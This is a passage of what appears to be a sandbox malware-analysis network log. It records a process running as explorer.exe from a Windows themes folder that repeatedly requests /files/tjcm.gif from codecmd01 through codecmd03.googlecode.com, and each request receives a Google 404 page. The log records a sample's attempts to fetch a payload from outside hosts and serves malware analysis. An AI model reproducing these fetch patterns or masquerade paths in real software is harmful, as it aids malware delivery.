                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          23192.168.2.44975964.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:57.528532982 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:58.251730919 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:58 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:58.251763105 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          24192.168.2.44976066.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:59.216964006 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:59.925331116 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:59 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:59.925390005 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          25192.168.2.44976274.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:00.980176926 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:01.689667940 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:01 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:01.689738035 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          26192.168.2.44976964.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:02.478761911 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:03.187700033 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:03 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:03.187736034 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          27192.168.2.44978066.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:03.990397930 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:04.694113970 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:04 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:04.694133043 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          28192.168.2.44979174.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:05.587814093 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:06.314169884 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:06 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:06.314229965 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          29192.168.2.44979764.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:06.964760065 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:07.674227953 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:07 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
